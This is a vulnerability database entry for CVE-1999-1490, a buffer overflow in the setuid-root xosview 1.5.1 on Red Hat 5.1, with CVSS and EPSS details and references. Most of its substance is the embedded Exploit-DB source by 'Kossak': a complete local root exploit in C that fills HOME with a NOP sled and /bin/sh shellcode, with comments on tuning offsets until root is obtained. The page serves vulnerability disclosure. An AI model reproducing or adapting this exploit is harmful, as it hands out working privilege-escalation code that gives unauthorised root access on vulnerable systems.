CVE-1999-1490 : Detail

CVE-1999-1490

0.13%V4
Local
2003-04-02
03h00 +00:00
2024-08-01
17h18 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

xosview 1.5.1 in Red Hat 5.1 allows local users to gain root access via a long HOME environmental variable.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19281

Publication date : 1999-05-27 22h00 +00:00
Author : Chris Evans
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/362/info xosview is an X11 system monitoring application that ships with RedHat 5.1 installed setuid root. A buffer overflow vulnerability was found in Xrm.cc, the offending code listed below: char userrfilename[1024]; strcpy(userrfilename, getenv("HOME")); The userfilename can be overflowed and arbritrary code executed to gain root access locally. * xosview 1.5.1 buffer overrun exploit * brought to you by Kossak (ldvg@rnl.ist.utl.pt) * * yep, this is a shameless rip from Aleph's tutorials, but it sure * works... Lets keep those exploits coming!! :) * Thanks to Chris Evans for posting the bug. */ /* NOTE!!! xosview needs an open X display for this to work, so remember * to modify the source (line 62), with your ip. * The offset and buffer size work with me fine, but you might need to * change them. */ #include <stdlib.h> #define DEFAULT_OFFSET 1150 #define DEFAULT_BUFFER_SIZE 3500 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("xosview exploit by Kossak\n"); printf("try changing the default values if you dont get root now.\n"); printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; setenv("HOME", buff, 1); system("/usr/bin/X11/xosview -display 0:0"); /* your IP here */ }

Products Mentioned

Configuraton 0

Redhat>>Linux >> Version 5.1

References

http://marc.info/?l=bugtraq&m=90221101926034&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://marc.info/?l=bugtraq&m=90221101926021&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/362
Tags : vdb-entry, x_refsource_BID